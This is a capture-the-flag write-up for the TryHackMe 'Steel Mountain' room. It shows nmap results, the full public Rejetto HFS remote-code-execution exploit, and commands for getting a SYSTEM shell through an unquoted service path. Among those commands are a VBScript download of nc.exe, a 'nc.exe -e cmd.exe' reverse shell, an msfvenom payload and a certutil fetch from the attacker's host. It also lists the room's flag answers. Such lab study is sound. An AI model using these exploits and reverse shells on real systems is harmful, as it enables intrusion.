Try โ€‚โ€‰HackMD

TryHackMe - Steel Mountain Writeup

tags: writeup tryhackme SteelMountain Easy

:computer: Port Scanning

First we make a nmap to the ip an we discover some webservers and that is a windows machine.

# Nmap 7.92 scan initiated Mon Mar 28 11:28:46 2022 as: nmap -sV -T4 -sS -v -p- -oN Ports 10.10.55.10
Increasing send delay for 10.10.55.10 from 0 to 5 due to 989 out of 2472 dropped probes since last increase.
Increasing send delay for 10.10.55.10 from 5 to 10 due to 11 out of 20 dropped probes since last increase.
Nmap scan report for 10.10.55.10
Host is up (0.14s latency).
Not shown: 65520 closed tcp ports (reset)
PORT      STATE SERVICE            VERSION
80/tcp    open  http               Microsoft IIS httpd 8.5
135/tcp   open  msrpc              Microsoft Windows RPC
139/tcp   open  netbios-ssn        Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds       Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
3389/tcp  open  ssl/ms-wbt-server?
5985/tcp  open  http               Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
8080/tcp  open  http               HttpFileServer httpd 2.3
47001/tcp open  http               Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
49152/tcp open  msrpc              Microsoft Windows RPC
49153/tcp open  msrpc              Microsoft Windows RPC
49154/tcp open  msrpc              Microsoft Windows RPC
49155/tcp open  msrpc              Microsoft Windows RPC
49156/tcp open  msrpc              Microsoft Windows RPC
49183/tcp open  msrpc              Microsoft Windows RPC
49184/tcp open  msrpc              Microsoft Windows RPC
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon Mar 28 11:45:37 2022 -- 1 IP address (1 host up) scanned in 1011.52 seconds
  • The web in port 80 contain info for some secundary flags.
  • The web in port 8080 is the main way to obtain the user flag and the root.

:eye: Enumeration

Source code

We can see the first flag as a comment in the web hosted on the port 80, we can see going to this web and pressing Ctrl+U:

As we see in the image The name of the photo is Bill Harper with this info we know the who is the employee of the month and we have the first Flag.

Bill Harper

Http File Server

After that enumerating the web on the port 80, It looks like you have nothing else, it will be time to go to the one on port 8080, We discover a http file server and if we look on exploit-db it has a exploit for RCE for this web app.

To know the exact program we can google it or click on httpfileserver 2.3 that redirect to the info page of the webapp, next to knowing the exact app is we can found it on exploit-db and start exploiting it.
With this we have three of four flags in task 2.

Scan the machine with nmap. What is the other port running a web server on?

8080

Take a look at the other web server. What file server is running?

Rejetto HTTP File Server

What is the CVE number to exploit this file server?

2014-6287

:bomb: Explotation

This is the exploit:
https://www.exploit-db.com/exploits/39161

:mag: Understanding the exploit:

This Exploit works as a curious way:
First it retrieves from a webserver a netcat binary, you have to edit and set your IP Address and Local Port, and start the server in the same directory where the compiled netcat binary is located.

#!/usr/bin/python
# Exploit Title: HttpFileServer 2.3.x Remote Command Execution
# Google Dork: intext:"httpfileserver 2.3"
# Date: 04-01-2016
# Remote: Yes
# Exploit Author: Avinash Kumar Thapa aka "-Acid"
# Vendor Homepage: http://rejetto.com/
# Software Link: http://sourceforge.net/projects/hfs/
# Version: 2.3.x
# Tested on: Windows Server 2008 , Windows 8, Windows 7
# CVE : CVE-2014-6287
# Description: You can use HFS (HTTP File Server) to send and receive files.
#	       It's different from classic file sharing because it uses web technology to be more compatible with today's Internet.
#	       It also differs from classic web servers because it's very easy to use and runs "right out-of-the box". Access your remote files, over the network. It has been successfully tested with Wine under Linux. 
 
#Usage : python Exploit.py <Target IP address> <Target Port Number>

#EDB Note: You need to be using a web server hosting netcat (http://<attackers_ip>:80/nc.exe).  
#          You may need to run it multiple times for success!


import urllib2
import sys

try:
	def script_create():
		urllib2.urlopen("http://"+sys.argv[1]+":"+sys.argv[2]+"/?search=%00{.+"+save+".}")

	def execute_script():
		urllib2.urlopen("http://"+sys.argv[1]+":"+sys.argv[2]+"/?search=%00{.+"+exe+".}")

	def nc_run():
		urllib2.urlopen("http://"+sys.argv[1]+":"+sys.argv[2]+"/?search=%00{.+"+exe1+".}")

	ip_addr = "10.10.10.10" #local IP address
	local_port = "443" # Local Port number
	vbs = "C:\Users\Public\script.vbs|dim%20xHttp%3A%20Set%20xHttp%20%3D%20createobject(%22Microsoft.XMLHTTP%22)%0D%0Adim%20bStrm%3A%20Set%20bStrm%20%3D%20createobject(%22Adodb.Stream%22)%0D%0AxHttp.Open%20%22GET%22%2C%20%22http%3A%2F%2F"+ip_addr+"%2Fnc.exe%22%2C%20False%0D%0AxHttp.Send%0D%0A%0D%0Awith%20bStrm%0D%0A%20%20%20%20.type%20%3D%201%20%27%2F%2Fbinary%0D%0A%20%20%20%20.open%0D%0A%20%20%20%20.write%20xHttp.responseBody%0D%0A%20%20%20%20.savetofile%20%22C%3A%5CUsers%5CPublic%5Cnc.exe%22%2C%202%20%27%2F%2Foverwrite%0D%0Aend%20with"
	save= "save|" + vbs
	vbs2 = "cscript.exe%20C%3A%5CUsers%5CPublic%5Cscript.vbs"
	exe= "exec|"+vbs2
	vbs3 = "C%3A%5CUsers%5CPublic%5Cnc.exe%20-e%20cmd.exe%20"+ip_addr+"%20"+local_port
	exe1= "exec|"+vbs3
	script_create()
	execute_script()
	nc_run()
except:
	print """[.]Something went wrong..!
	Usage is :[.] python exploit.py <Target IP address>  <Target Port Number>
	Don't forgot to change the Local IP address and Port number on the script"""

With the exploit downloaded and the ip and port changed we have to download a static binary of netcat from github:

In this case we use this file but any static binary of netcat will be ok.

After download it we have to set up a local web server in the same directory we download it, we can do it with php or other languages but this time i'm gonna use python3.

python3 -m http.server 8080

As we said before the exploit first download a the netcat binary in the target machine and the second time we run the exploit we receive a shell to the ip that we writed.

To receive it we have to close the http server and set-up a netcat listener on our PC.
After run the exploit twice we receive a shell on the target.

If we go to Bill Desktop we can see the flag:

With this we have the last question of task 2:

b04763b6fcf51fcd7c13abc7db4fd365

It's time to privesc!

๐Ÿชœ ROOT PRIVESC

At the beggining if we not have idea we can run winpeas.bat

In this case the Room say to us that is a Unquoted Service Path Vulnerability
To enumerate the services we use some of this two commands:

wmic service get name,displayname,pathname,startmode |findstr /i "Auto" | findstr /i /v "C:\Windows\\" |findstr /i /v """

wmic service get name,displayname,pathname,startmode | findstr /i /v "C:\\Windows\\system32\\" |findstr /i /v """

To exploit this Vulnerability we need to understand how Windows search the files after understanding this we know that AdvancedSystemCareService9 is not in quotes and it will be a explotable service.

Now we have to generate the payload and upload to the directory of the machine. We have to go to:

C:\Program Files (x86)\IObit\

and download here with certutil but first generate the payload and start the web server with python:

  • To generate the payload we use msfvenom:
msfvenom -p windows/shell_reverse_tcp LHOST=10.11.66.103 LPORT=80 -e x86/shikata_ga_nai -f exe -o Advanced.exe
  • Then start the webserver:

  • Download the file into the target machine with certutil:
certutil -urlcache -f http://10.10.10.10:8080/Advanced.exe Advanced.exe

After that we create a nc listener in the port that we configured the payload(80 in this case) and we have to restart the service, to do it we use the following commands:

sc stop AdvancedSystemCareService9

sc start AdvancedSystemCareService9

After executing those commands we receive a SYSTEM shell in our nc listener and we can read the root flag.

The root flag is:

9af5f314f57607c00fd09803a587db80

You can find me on:

:bird:Twitter
:desktop_computer: Github
:ballot_box_with_check: TryHackMe
:green_book:HackTheBox

Last changed by 
โ€‰
Mecanico
I am a cybersecurity enthusiast documenting his path in pentesting and infosec.
0
433

Read more

HackTheBox - Sauna Writeup

:computer: Port Scanning # Nmap 7.92 scan initiated Thu Aug 25 18:16:41 2022 as: nmap -sV -T4 -sT -sC -v -oN nmap 10.10.10.175 Nmap scan report for 10.10.10.175 Host is up (0.066s latency). Not shown: 990 filtered tcp ports (no-response) PORT STATE SERVICE VERSION 53/tcp open domain Simple DNS Plus 80/tcp open http Microsoft IIS httpd 10.0 |_http-server-header: Microsoft-IIS/10.0 | http-methods:

Sep 1, 2022
HackTheBox - Forest Writeup

:computer: Port Scanning # Nmap 7.92 scan initiated Sun Aug 14 11:58:06 2022 as: nmap -sV -T4 -sS -sC -v -oN nmap 10.10.10.161 Nmap scan report for forest.htb (10.10.10.161) Host is up (0.12s latency). Not shown: 989 closed tcp ports (reset) PORT STATE SERVICE VERSION 53/tcp open domain Simple DNS Plus 88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2022-08-14 16:05:06Z) 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn

Aug 26, 2022
HackTheBox - Friendzone Writeup

:computer: Port Scanning # Nmap 7.92 scan initiated Mon Aug 8 06:53:23 2022 as: nmap -sV -T4 -sT -sC -v -oN nmap 10.10.10.123 Nmap scan report for 10.10.10.123 Host is up (0.041s latency). Not shown: 993 closed tcp ports (conn-refused) PORT STATE SERVICE VERSION 21/tcp open ftp vsftpd 3.0.3 22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 a9:68:24:bc:97:1f:1e:54:a5:80:45:e7:4c:d9:aa:a0 (RSA)

Aug 14, 2022
HackTheBox - Poison Writeup

:computer: Port Scanning # Nmap 7.92 scan initiated Fri Jun 10 07:21:26 2022 as: nmap -sV -T4 -sS -v -sC -p- -Pn -oN ports3 10.10.10.84 Nmap scan report for 10.10.10.84 Host is up (0.042s latency). Not shown: 65533 closed tcp ports (reset) PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.2 (FreeBSD 20161230; protocol 2.0) | ssh-hostkey: | 2048 e3:3b:7d:3c:8f:4b:8c:f9:cd:7f:d2:3a:ce:2d:ff:bb (RSA) | 256 4c:e8:c6:02:bd:fc:83:ff:c9:80:01:54:7d:22:81:72 (ECDSA)

Jun 12, 2022
Read more from Mecanico
Published on HackMD